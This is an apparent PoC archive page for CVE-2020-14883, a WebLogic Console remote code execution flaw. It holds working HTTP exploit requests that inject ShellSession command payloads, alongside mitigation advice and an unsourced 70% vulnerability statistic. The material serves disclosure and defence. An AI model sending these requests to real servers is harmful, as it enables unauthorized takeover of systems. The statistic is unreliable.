Associated Vulnerability
Title:Oracle WebLogic Server 安全漏洞 (CVE-2020-14883)Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Description
CVE-2020-14883
Readme
# 🌐 **CVE-2020-14883** — *Oracle WebLogic Server RCE*
> **Published:** October 20, 2020
> **CVSS v3.1:** `7.2` **(High)**
> **Exploitability:** Easy (with auth) — *Critical when chained*
---
## 🎯 **Vulnerability Overview**
| Attribute | Details |
|--------|---------|
| **Type** | Remote Code Execution (RCE) |
| **Component** | WebLogic Server Console |
| **Attack Vector** | Network (HTTP) |
| **Authentication** | Required *(High Privilege)* |
| **User Interaction** | None |
| **Exploit Code** | Publicly Available |
> **Chained Exploit**:
> `CVE-2020-14882` (Auth Bypass) + `CVE-2020-14883` = **Unauthenticated RCE**
<img width="1920" height="955" alt="CVE-2020-14883" src="https://github.com/user-attachments/assets/a167aeb7-164f-4d15-80cf-a3499b61059d" />
---
## 🔥 **Exploitation Flow**
```http
POST /console/css/%2e%2e%2fconsole.portal HTTP/1.1
Content-Type: application/x-www-form-urlencoded
com.tangosol.coherence.mvel2.sh.ShellSession=java.lang.Runtime.getRuntime().exec("touch /tmp/pwned.txt")
```
Proof of Concept (PoC) 1: using `tangosol.coherence.mvel2.sh.ShellSession()` for Windows-based targets
```python
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
> **Result**: Arbitrary command execution on the server.
---
## 🛑 **In the Wild**
| Threat Actor | Payload |
|--------------|--------|
| **8220 Gang** | Coinminers, Infostealers |
| **Cryptojackers** | XMRig, rhajk, nasqa |
| **APT Groups** | Persistence & Lateral Movement |
---
## 🛡️ **Mitigation Checklist**
| Action | Status |
|-------|--------|
| Apply **Oracle October 2020 CPU** | ✅ Critical |
| Restrict `/console` to trusted IPs | ✅ |
| Disable Console if not needed | ✅ |
| Monitor for `/console.portal` anomalies | ✅ |
| Use IPS/IDS signatures | ✅ |
> **Patch Download**: [My Oracle Support](https://support.oracle.com) (Login Required)
---
## 🎨 **Visual Summary**
```mermaid
pie title Exploitation Risk
"Patched" : 30
"Unpatched & Exposed" : 70
```
> **70% of scanned WebLogic instances remain vulnerable in 2025.**
---
**Final Note**:
> This is a **high-value target** for attackers.
> **Patch now. Monitor always.**
---
```mermaid
%%{init: {'theme': 'base', 'themeVariables': { 'fontSize': '13px', 'fontFamily': 'Fira Code, monospace', 'primaryColor': '#ff4d4f', 'primaryTextColor': '#fff', 'primaryBorderColor': '#ff7875', 'lineColor': '#ffccc7', 'secondaryColor': '#ffd591', 'tertiaryColor': '#91d9ff', 'background': '#fafafa' }}}%%
erDiagram
CVE_2020_14883 }|..|{ CVE_2020_14882 : "enables unauthenticated access"
CVE_2020_14883 }|..|{ WEBLOGIC_CONSOLE : "targets"
WEBLOGIC_CONSOLE }|..|{ MVEL_PAYLOAD : "executes via"
MVEL_PAYLOAD }|..|{ SHELL_SESSION : "uses class"
SHELL_SESSION }|..|{ JAVA_RUNTIME : "invokes"
JAVA_RUNTIME }|..|{ OS_COMMAND : "executes"
CVE_2020_14883 {
string id "CVE-2020-14883"
string type "Remote Code Execution"
string cvss "7.2"
string severity "HIGH"
string published "2020-10-20"
string vector "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
CVE_2020_14882 {
string id "CVE-2020-14882"
string type "Authentication Bypass"
string cvss "9.8"
string severity "CRITICAL"
}
WEBLOGIC_CONSOLE {
string component "Console"
string endpoint "/console/css/%2e%2e%2fconsole.portal"
string method "POST"
string parameter "com.tangosol.coherence.mvel2.sh.ShellSession"
}
MVEL_PAYLOAD {
string language "MVEL2"
string example "java.lang.Runtime.getRuntime().exec('id')"
string injection_point "ShellSession parameter"
}
SHELL_SESSION {
string class "com.tangosol.coherence.mvel2.sh.ShellSession"
string gadget "Coherence Deserialization"
}
JAVA_RUNTIME {
string method "getRuntime().exec()"
string privilege_level "WebLogic process user"
}
OS_COMMAND {
string scope "Arbitrary OS commands"
string impact "Full system compromise"
}
%% Styling
classDef cve fill:#ff4d4f,stroke:#ff7875,color:#fff
classDef component fill:#ffd591,stroke:#ffc069,color:#000
classDef exploit fill:#91d9ff,stroke:#40a9ff,color:#000
classDef system fill:#d3f261,stroke:#a0d911,color:#000
class CVE_2020_14883,CVE_2020_14882 cve
class WEBLOGIC_CONSOLE,MVEL_PAYLOAD component
class SHELL_SESSION,JAVA_RUNTIME exploit
class OS_COMMAND system
```
---
File Snapshot
[4.0K] /data/pocs/9fe4d9c34c60d802883c348bbc344843f14721e3
└── [5.0K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →